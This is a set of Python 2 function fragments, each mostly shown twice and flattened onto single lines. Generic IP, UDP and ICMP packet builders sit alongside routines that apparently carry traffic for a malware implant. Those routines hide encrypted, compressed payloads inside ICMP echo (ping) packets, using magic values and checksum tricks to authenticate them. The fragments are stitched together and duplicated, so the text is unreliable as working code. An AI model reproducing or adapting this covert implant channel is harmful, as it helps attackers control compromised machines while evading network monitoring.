def ReadInPacket(self,pkt): self.data = "" icmpcsum = inet.cksum(pkt) # Initial checks #print "Checking entire checksum" if icmpcsum != 0: print "Ping packet checksum is incorrect....ignoring packet" raise ValueError, pkt #print "Checking for 0x0809" if struct.unpack("!H",pkt[16:18])[0] != 0x0809L: print "Did not find 0x0809 just before the checksum" raise ValueError, pkt #print "Looking for no 0x0a0b" if struct.unpack("!H",pkt[18:20])[0] == 0x0a0bL: print "Found the invalid checksum 0x0A0B" raise ValueError, pkt icmp_type = pkt[0] icmp_code = pkt[1] icmp_ident = struct.unpack("!H",pkt[4:6])[0] icmp_seq = struct.unpack("!H",pkt[6:8])[0] ping_timestamp_sec = struct.unpack("!L",pkt[8:12])[0] ping_timestamp_usec = struct.unpack("!L",pkt[12:16])[0] chksum1 = struct.unpack("!H",pkt[18:20])[0] #print "Checking ident" if icmp_ident != self.pid: print "Packet not for us. Possibly for another process?" raise ValueError, pkt # Checking seq if icmp_seq != self.seq: print "Packet received out of order" raise ValueError, pkt # Decrypt pt = self.implant.cipher.Decrypt(pkt[20:]) #print "Checking pt checksum" if inet.cksum(pt) != 0: print "Auth[0] checksum is incorrect" raise ValueError, pt chksum2 = struct.unpack("!H",pt[:2])[0] #print "Checking for matching auth[0][0] chksum" if chksum2 != chksum1: print "Checksum inside auth[0] doesn't match the one on the outside" raise ValueError, pt if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L): print "Data received in the low order byte of auth[1]" raise ValueError, pt
def ReadInPacket(self, pkt): self.data = "" icmpcsum = inet.cksum(pkt) # Initial checks #print "Checking entire checksum" if icmpcsum != 0: print "Ping packet checksum is incorrect....ignoring packet" raise ValueError, pkt #print "Checking for 0x0809" if struct.unpack("!H", pkt[16:18])[0] != 0x0809L: print "Did not find 0x0809 just before the checksum" raise ValueError, pkt #print "Looking for no 0x0a0b" if struct.unpack("!H", pkt[18:20])[0] == 0x0a0bL: print "Found the invalid checksum 0x0A0B" raise ValueError, pkt icmp_type = pkt[0] icmp_code = pkt[1] icmp_ident = struct.unpack("!H", pkt[4:6])[0] icmp_seq = struct.unpack("!H", pkt[6:8])[0] ping_timestamp_sec = struct.unpack("!L", pkt[8:12])[0] ping_timestamp_usec = struct.unpack("!L", pkt[12:16])[0] chksum1 = struct.unpack("!H", pkt[18:20])[0] #print "Checking ident" if icmp_ident != self.pid: print "Packet not for us. Possibly for another process?" raise ValueError, pkt # Checking seq if icmp_seq != self.seq: print "Packet received out of order" raise ValueError, pkt # Decrypt pt = self.implant.cipher.Decrypt(pkt[20:]) #print "Checking pt checksum" if inet.cksum(pt) != 0: print "Auth[0] checksum is incorrect" raise ValueError, pt chksum2 = struct.unpack("!H", pt[:2])[0] #print "Checking for matching auth[0][0] chksum" if chksum2 != chksum1: print "Checksum inside auth[0] doesn't match the one on the outside" raise ValueError, pt if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L): print "Data received in the low order byte of auth[1]" raise ValueError, pt
def SendTo(self, data): self.PreSendChecks() # Get current time curr_time = time.time() curr_time_sec = int(curr_time) curr_time_usec = int((curr_time - float(curr_time_sec)) * 1000000.) # Construct the ICMP header idseq = struct.pack("!HH", self.pid, self.seq) icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq # Construct the ECHO header and checksum echo_header_tmp = struct.pack("!LLH", \ curr_time_sec, curr_time_usec, 0x0809) echo_header = echo_header_tmp + '\000\000' echo_header_cksum = inet.cksum(icmp_header + echo_header) echo_header_cksum = (struct.unpack( "!L", '\000\000' + struct.pack("!H", echo_header_cksum)))[0] # Make sure the checksum is not 0x0a0b if echo_header_cksum == 0x0a0b: echo_header_tmp = struct.pack("!LLH", curr_time_sec, curr_time_usec + 1, 0x0809) echo_header_cksum = struct.unpack( "!L", '\000\000' + struct.pack("!H", echo_header_cksum))[0] # Add the checksum to the header echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum) # Auth[0] = [ cksum for echo_header ] [ cksum for data ] data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\ '\000\000' + struct.pack("!L", 0xffffff00L) +\ data) auth_0 = struct.pack("HH", echo_header_cksum, data_cksum) auth_1 = struct.pack("!L", 0xffffff00L) msg = auth_0 + auth_1 + data # Encrypt if necessary if self.implant.cipher: msg = self.implant.cipher.Encrypt(msg) # Compress if necessary if self.compression: msg = compression.Compress(msg) # Reconstruct the ICMP header with the checksum icmp_header = chr(8) + chr(0) +\ struct.pack("H", inet.cksum(icmp_header + \ echo_header +\ msg)) + idseq # Send it out fpos = icmp_header + echo_header + msg self.sock.sendto(fpos, self.dest)
def SendTo(self, data): self.PreSendChecks() # Get current time curr_time = time.time() curr_time_sec = int(curr_time) curr_time_usec = int((curr_time - float(curr_time_sec))*1000000.) # Construct the ICMP header idseq = struct.pack("!HH", self.pid, self.seq) icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq # Construct the ECHO header and checksum echo_header_tmp = struct.pack("!LLH", \ curr_time_sec, curr_time_usec, 0x0809) echo_header = echo_header_tmp + '\000\000' echo_header_cksum = inet.cksum(icmp_header + echo_header) echo_header_cksum = (struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum)))[0] # Make sure the checksum is not 0x0a0b if echo_header_cksum == 0x0a0b: echo_header_tmp = struct.pack("!LLH", curr_time_sec, curr_time_usec+1, 0x0809) echo_header_cksum = struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum))[0] # Add the checksum to the header echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum) # Auth[0] = [ cksum for echo_header ] [ cksum for data ] data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\ '\000\000' + struct.pack("!L", 0xffffff00L) +\ data) auth_0 = struct.pack("HH",echo_header_cksum, data_cksum) auth_1 = struct.pack("!L",0xffffff00L) msg = auth_0 + auth_1 + data # Encrypt if necessary if self.implant.cipher: msg = self.implant.cipher.Encrypt(msg) # Compress if necessary if self.compression: msg = compression.Compress(msg) # Reconstruct the ICMP header with the checksum icmp_header = chr(8) + chr(0) +\ struct.pack("H", inet.cksum(icmp_header + \ echo_header +\ msg)) + idseq # Send it out fpos = icmp_header + echo_header + msg self.sock.sendto(fpos, self.dest)
def __disassemble(self, raw_packet, cksum=0): # The kernel computes the checksum, even on a raw packet. packet = inet.net2iph(raw_packet) b1 = ord(packet[0]) self.v = (b1 >> 4) & 0x0f self.hl = b1 & 0x0f if self.v != IPVERSION: raise ValueError, "cannot handle IPv%d packets" % self.v hl = self.hl * 4 # verify the checksum self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff if cksum: our_cksum = inet.cksum(packet[:20]) if our_cksum != 0: raise ValueError, packet # unpack the fields elts = struct.unpack('cchhhcc', packet[:hl - 10]) # struct didn't do !<> when this was written self.tos = ord(elts[1]) self.len = elts[2] & 0xffff self.id = elts[3] & 0xffff self.off = elts[4] & 0xffff self.ttl = ord(elts[5]) self.p = ord(elts[6]) self.data = packet[hl:] self.src = packet[hl - 8:hl - 4] self.dst = packet[hl - 4:hl] self.__unparse_addrs()
def __disassemble(self, raw_packet, cksum=0): # Ok, I didn't realize this. The kernel does the checksum for # you, even on a raw packet. Plus, the Python cksum code seems # to be buggy. It's different than the IP version by ...01010 packet = inet.net2iph(raw_packet) b1 = ord(packet[0]) self.v = (b1 >> 4) & 0x0f self.hl = b1 & 0x0f if self.v != IPVERSION: raise ValueError, "cannot handle IPv%d packets" % self.v hl = self.hl * 4 # verify the checksum self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff if cksum: our_cksum = inet.cksum(packet[:20]) if our_cksum != 0: raise ValueError, packet # unpack the fields elts = struct.unpack('cchhhcc', packet[:hl-10]) # struct didn't do !<> when this was written self.tos = ord(elts[1]) self.len = elts[2] & 0xffff self.id = elts[3] & 0xffff self.off = elts[4] & 0xffff self.ttl = ord(elts[5]) self.p = ord(elts[6]) self.data = packet[hl:] self.src = packet[hl-8:hl-4] self.dst = packet[hl-4:hl] self.__unparse_addrs()
def assemble(self, cksum=0): "Get a packet suitable for sending over an IP socket." # make sure all the data is ready self.len = self.hl * 4 + len(self.data) self.__parse_addrs() # create the packet header = struct.pack('cchhhcc', chr((self.v & 0x0f) << 4 | (self.hl & 0x0f)), # 4bits each chr(self.tos & 0xff), self.len, self.id, self.off, # what about flags? chr(self.ttl & 0xff), chr(self.p & 0xff)) if cksum: self.sum = inet.cksum(header + '\000\000' + self.__src + self.__dst) packet = header + struct.pack('h', self.sum) \ + self.__src + self.__dst else: packet = header + '\000\000' + self.__src + self.__dst packet = packet + self.data self.__packet = inet.iph2net(packet) return self.__packet
def assemble(self, cksum=1): idseq = struct.pack('hh', self.id, self.seq) packet = chr(self.type) + chr(self.code) + '\000\000' + idseq + self.data if cksum: self.cksum = inet.cksum(packet) packet = chr(self.type) + chr(self.code) + struct.pack('H', self.cksum) + idseq + self.data self.__packet = packet return self.__packet
def SendTo(self,data): data_cksum = inet.cksum( '\000\000\000\000' + \ struct.pack("!L",0xffffff00L) + data) auth_0 = struct.pack("HH",0,data_cksum) auth_1 = struct.pack("!L",0xffffff00L) msg = auth_0 + auth_1 + data msg = self.implant.cipher.Encrypt(msg) self.sock.send(msg)
def assemble(self, cksum=1): self.ulen = 8 + len(self.data) begin = struct.pack('hhh', self.sport, self.dport, self.ulen) packet = begin + '\000\000' + self.data if cksum: self.sum = inet.cksum(packet) packet = begin + struct.pack('h', self.sum) + self.data self.__packet = inet.udph2net(packet) return self.__packet
def __disassemble(self, raw_packet, cksum=1): packet = inet.net2updh(raw_packet) if cksum and packet[6:8] != '\000\000': our_cksum = inet.cksum(packet) if our_cksum != 0: raise ValueError, packet elts = map(lambda x: x & 0xffff, struct.unpack('hhhh', packet[:8])) [self.sport, self.dport, self.ulen, self.sum] = elts self.data = packet[8:]
def __disassemble(self, raw_packet, cksum=1): packet = inet.net2updh(raw_packet) if cksum and packet[6:8] != '\000\000': our_cksum = inet.cksum(packet) if our_cksum != 0: raise ValueError, packet elts = map(lambda x:x & 0xffff, struct.unpack('hhhh', packet[:8])) [self.sport, self.dport, self.ulen, self.sum] = elts self.data = packet[8:]
def __disassemble(self, packet, cksum=1): if cksum: our_cksum = inet.cksum(packet) if our_cksum != 0: raise ValueError, packet self.type = ord(packet[0]) self.code = ord(packet[1]) elts = struct.unpack('hhh', packet[2:8]) [self.cksum, self.id, self.seq] = map(lambda x:x & 0xffff, elts) self.data = packet[8:]
def assemble(self, cksum=1): idseq = struct.pack("hh", self.id, self.seq) packet = chr(self.type) + chr(self.code) + "\000\000" + idseq + self.data if cksum: self.cksum = inet.cksum(packet) packet = chr(self.type) + chr(self.code) + struct.pack("h", self.cksum) + idseq + self.data # Don't need to do any byte-swapping, because idseq is # appplication defined and others are single byte values. self.__packet = packet return self.__packet
def __disassemble(self, packet, cksum=1): if cksum: our_cksum = inet.cksum(packet) if our_cksum != 0: raise ValueError, packet self.type = ord(packet[0]) self.code = ord(packet[1]) elts = struct.unpack('hhh', packet[2:8]) [self.cksum, self.id, self.seq] = map(lambda x: x & 0xffff, elts) self.data = packet[8:]
def RecvFrom(self): stuff = self.sock.recv(1500) # Decrypt pt = self.implant.cipher.Decrypt(stuff) if inet.cksum(pt) != 0: print "Auth[0] checksum is incorrect" raise ValueError, pt if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L): print "Data received in the low order byte of auth[1]" raise ValueError, pt
def assemble(self, cksum=1): idseq = struct.pack('hh', self.id, self.seq) packet = chr(self.type) + chr(self.code) + '\000\000' + idseq \ + self.data if cksum: self.cksum = inet.cksum(packet) packet = chr(self.type) + chr(self.code) \ + struct.pack('H', self.cksum) + idseq + self.data # Don't need to do any byte-swapping, because idseq is # appplication defined and others are single byte values. self.__packet = packet return self.__packet
def RecvFrom(self): stuff = self.sock.recv(1500) # Decrypt pt = self.implant.cipher.Decrypt(stuff) if inet.cksum(pt) != 0: print "Auth[0] checksum is incorrect" raise ValueError, pt if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L): print "Data received in the low order byte of auth[1]" raise ValueError, pt